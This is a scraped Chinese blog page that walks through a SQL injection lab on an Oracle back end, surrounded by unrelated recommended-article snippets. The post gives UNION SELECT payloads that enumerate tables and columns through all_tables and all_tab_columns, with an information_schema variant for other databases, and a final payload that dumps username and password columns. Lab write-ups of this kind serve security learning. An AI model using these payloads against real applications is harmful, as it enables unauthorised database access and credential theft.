SQLi lab: Equivalent to information schema on Oracle

最新推荐文章于 2025-08-12 23:15:00 发布
最新推荐文章于 2025-08-12 23:15:00 发布
阅读量180 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Security 文章标签: java servlet junit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/quandaquan/article/details/126353931
这篇博客详细记录了一次针对Oracle数据库的SQL注入过程,首先利用`+UNION+SELECT+table_name,NULL+FROM+all_tables--`和`+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USER'--`查询获取了表名和列名。在发现表`USERS_MEXYAA`和可能的敏感列`PASSWORD_IURFRJ`、`USERNAME_YPUOMR`之后,尝试通过`+UNION+SELECT+USERNAME_YPUOMR,+PASSWORD_IURFRJ+FROM+USERS_MEXYAA--`来进一步获取数据。然而,没有提供具体的数据读取结果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

对于oracle数据库

'+UNION+SELECT+table_name,NULL+FROM+all_tables--

btw,如果是非oracle数据的库

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

获取了table name,这几个users table 看起来像吗?

 接下来试着查下这几个表的column

'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USER'--

啥也没读出来。。。。

然后换一个,MEXYAA,读出来,这两个看起来像账号密码的column name

 接下来读administrator吧

这两个列

PASSWORD_IURFRJ

USERNAME_YPUOMR

'+UNION+SELECT+USERNAME_YPUOMR,+PASSWORD_IURFRJ+FROM+USERS_MEXYAA--

 然后当然是。。。

reference

SQLi-Lab:每个SQL注入实验室
03-29
SQLi-Lab是一个专门用于学习和练习SQL注入技术的平台,对于理解和防范这种攻击非常有帮助。 在"SQLi-Lab:每个SQL注入实验室"中,你可以期待以下的知识点: 1. **SQL注入基础**:了解SQL注入的基本原理,包括如何...
dvwa+sqlilab+burp+phpstudy所需安装包.rar
11-08
搭建phpstudy环境,并在phpstudy环境下搭建sqlilab和dvwa,安装dvwa 具体配置详见https://blog.csdn.net/qq_37077262/article/details/102945140
个人实验室sqli_lab:深入学习SQL注入技术
sqli_lab是一个专门用于学习和练习SQL注入技术的个人实验室平台。该平台以PHP语言编写,允许用户在安全的环境中学习和实践SQL注入攻击的各种技术。SQL注入是一种代码注入技术,攻击者通过在Web应用的SQL查询中插入...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
Java集合中的链表
Y409001的博客
08-08 920
本文详细介绍了Java中LinkedList的实现原理及其应用。首先分析了ArrayList在插入删除操作上的效率问题,引出链表结构的必要性。文章详细讲解了单向链表的基本概念、8种链表结构分类,以及不带头单向链表的具体实现,包括节点定义、接口设计和基本操作方法(增删改查)。重点说明了头插法、尾插法和任意位置插入的实现细节与注意事项。最后提供了9个链表相关的经典面试题及其解决方案,包括链表反转、中间节点查找、回文判断、环检测等。
c++ 常见关键字
u012719076的博客
08-11 355
override 子类种重写父类中函数,,仅用于派生类虚函数,强制检查重写正确性。final 防止子类继承,用于类或虚函数,限制继承或重写。c++ 函数模板、类模板-CSDN博客。四、template 模板。
【32】C#实战篇——两个文件夹下 相同名字的文件 进行配对(两个文件夹下的文件数量和文件类型不一定相同,所以要过滤掉我们不要的文件)
程序员,他们想的是什么?他们想的永远都是技术,他们崇尚的也永远都是技术。
08-09 627
该代码实现了一个文件配对功能,用于匹配两个文件夹下具有相同文件名且符合指定后缀条件的CSV文件。通过正则表达式过滤出符合"Wide.csv"、"Tele.csv"或"Mid.csv"后缀的文件,将匹配成功的文件路径分别存储在StandardDataPath和CurrentDataPath两个数组中,保持一一对应关系,并返回匹配成功的文件对数。输入为标准数据和当前数据文件夹路径及后缀过滤条件,输出为匹配的文件路径数组和匹配总数。
LangChain4j终极指南:Spring Boot构建企业级Agent框架
夜雨的博客
08-08 1668
LangChain4j终极指南:Spring Boot构建企业级Agent框架。实时流量看板:QPS、错误率、响应时间;资源利用率:CPU/内存/GPU使用率;LLM性能分析:Token消耗、推理延迟分布;工具热力图:调用频率、执行时长排行
Java使用“Microsoft Print To PDF”打印时如何指定输出路径
118路司机的博客
08-11 562
本文介绍了如何通过Java程序动态指定Microsoft Print To PDF虚拟打印机的输出路径。
Spring Boot 菜单删除功能的实现与事务管理
m0_62923286的博客
08-11 408
在后台管理系统开发中,菜单管理是一个核心功能,而删除菜单作为其中的重要操作,需要考虑数据完整性、关联关系处理和操作安全性。本文将详细介绍 Spring Boot 环境下菜单删除功能的实现逻辑,包括关联数据处理、事务控制和异常处理等关键环节。
JAVA 分布式锁的5种实现方式
gonghua0502的专栏
08-08 586
就是先select …每次更新修改,都会自增加一,然后去更新余额时,把查出来的那个版本号,带上条件去更新,如果是上次那个版本号,就更新,如果不是,表示别人并发修改过了,就继续重试。创建一个临时节点,获取当前父节点下的子节点,如果是为最小的节点,则表示获取锁成功,否则获取锁失败,阻塞等待,则监听上一个节点。多个jvm集群的定时任务,在触发的时候,获取分布式锁,如果能够获取到分布式锁的jvm,就能够执行定时任务,没有获取到的就不能执行定时任务。当我们定时任务服务集群的情况下,有可能会同时重复执行定时任务,
Gradle(二)Gradle的优势、项目结构介绍
最新发布
ACGkaka的博客
08-12 492
Gradle(二)Gradle的优势、项目结构介绍
Bee 2.5.2.6 发布
abckingaa的博客
08-09 260
Bee ORM框架2.5.2.6版本发布,这是一个功能强大且轻量级的Java ORM工具(仅935KB)。该版本默认开启常用配置,支持SQL关键字作为字段名,优化了日志系统和数据源配置。Bee集成了Hibernate/MyBatis等主流ORM功能,并具备分库分表、MongoDB支持等特性,性能优异。新版本还兼容多种配置风格,支持SQL执行时间监控等功能。开发者可通过官网获取测试示例和自动生成SpringBoot微服务代码工具。项目持续迭代中,欢迎用户反馈需求建议。
【限时分享:Hadoop+Spark+Vue技术栈电信客服数据分析系统完整实现方案
biyesheji88的博客
08-12 769
限时分享:Hadoop+Spark+Vue技术栈电信客服数据分析系统完整实现方案
Linux学习-应用软件编程(文件IO)
2501_91684151的博客
08-12 472
Linux内核专门为应用层提供的文件操作方式。1.打开文件 open2.读写文件 read/write3.关闭文件 close。
2025C卷】华为OD机试九日集训第5期 - 按算法分类,由易到难,提升编程能力和解题技巧
学Java,找哪吒
08-12 494
参加完华为OD七日集训的小伙伴,可以写一篇“华为OD七日集训总结”文章,发布在CSDN,作为一个成果物。支持ChatGPT所有插件,可创建自己的ChatGPT插件,使用朋友分享的自定义插件。例如最强编程插件Code Copilot、AI绘画插件DALL-E、论文专属Consensus、搜索文献插件Scholar GPT。刷了700多道题。
JavaWeb 30 天入门:第五天 —— 面向对象之继承与多态
m0_73803300的博客
08-10 849
本文将深入讲解面向对象编程中继承与多态两个核心特性。首先介绍继承的概念、语法实现及访问规则,通过Person、Student、Teacher类示例说明继承关系和使用方法。重点讲解方法重写的规则和应用场景,对比方法重载的区别。
零基础数据结构与算法——第七章:算法实践与工程应用-性能分析与瓶颈
qqxhb 资源共享
08-12 114
本文介绍了性能分析与优化的方法,通过汽车保养等生活例子类比编程优化过程。首先阐述了性能分析工具的重要性,包括性能分析器、基准测试、内存分析工具等,帮助定位程序瓶颈。然后分析了常见的性能瓶颈:不必要的对象创建、方法调用、IO操作和同步机制,通过代码示例对比展示了优化前后的差异。文章强调通过专业工具诊断问题并针对性优化,可以有效提升程序性能,就像精准维修汽车能显著改善其运行状态。这些优化技巧适用于各种编程场景,有助于开发高效稳定的软件系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值